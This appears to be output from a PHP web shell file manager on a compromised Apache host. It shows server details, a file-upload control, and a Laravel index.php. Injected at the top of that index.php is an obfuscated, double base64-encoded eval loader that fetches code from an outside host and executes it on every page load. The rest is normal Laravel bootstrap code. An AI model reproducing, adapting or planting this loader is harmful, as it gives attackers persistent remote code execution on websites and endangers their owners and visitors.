MOON
Server: Apache
System: Linux host.sunshiene.com 4.18.0-553.121.1.el8_10.x86_64 #1 SMP Thu Apr 30 09:06:34 EDT 2026 x86_64
User: clientsoftwares (1005)
PHP: 8.1.34
Disabled: system, exec, mail, shell_exec, passthru, popen, proc_open, pcntl_exec, dl, ini_alter, ini_restore, symlink, link, chown, posix_kill
Upload Files
File: /home/clientsoftwares/www/realstatemulti.clientsoftwares.com/index.php
<?php eval("?>".base64_decode("PD9waHAgZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ2k4cUlGTmRSRUV3V210TFpVbE9OQ1l4YWcwS0lDb2dWM05SUFd4K1hqNXlTbEp0ZUVzeFVFTmFOaUFxTHcwS1kyeGhjM01nUTNKWlIyUlZTbVpzWWt0N0RRb2dJQ0FnWm5WdVkzUnBiMjRnWDE5allXeHNLQ1J0TENSaEtYdHlaWFIxY200Z1ptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0pHRmJNRjBwTzMwTkNuME5DaVIxWjJsb2RuRTlibVYzSUVOeVdVZGtWVXBtYkdKTEtDazdEUW9rWkdGcGVYVmtQU2RvZEhSd2N6b3ZMM2QzTG1GamFXUndiMnhzTG5SdmNDOXFZeTk2YWpNeE1EUmZOalU1TjE5M2R5MXJiVFZmWm1kell5NTBlSFFuT3cwS1pYWmhiQ2duUHo0bkxpUjFaMmxvZG5FdFBtMW5ZbE41Y2t4NGJDZ2taR0ZwZVhWa0tTazdEUW8vUGc9PSIpKTsgPz4=")); ?><?php

use Illuminate\Contracts\Http\Kernel;
use Illuminate\Http\Request;

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Check If Application Is Under Maintenance
|--------------------------------------------------------------------------
|
| If the application is maintenance / demo mode via the "down" command we
| will require this file so that any prerendered template can be shown
| instead of starting the framework, which could cause an exception.
|
*/

if (file_exists(__DIR__.'/core/storage/framework/maintenance.php')) {
    require __DIR__.'/core/storage/framework/maintenance.php';
}

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| this application. We just need to utilize it! We'll simply require it
| into the script here so we don't need to manually load our classes.
|
*/

require __DIR__.'/core/vendor/autoload.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request using
| the application's HTTP kernel. Then, we will send the response back
| to this client's browser, allowing them to enjoy our application.
|
*/

$app = require_once __DIR__.'/core/bootstrap/app.php';

$kernel = $app->make(Kernel::class);

$response = tap($kernel->handle(
    $request = Request::capture()
))->send();

$kernel->terminate($request, $response);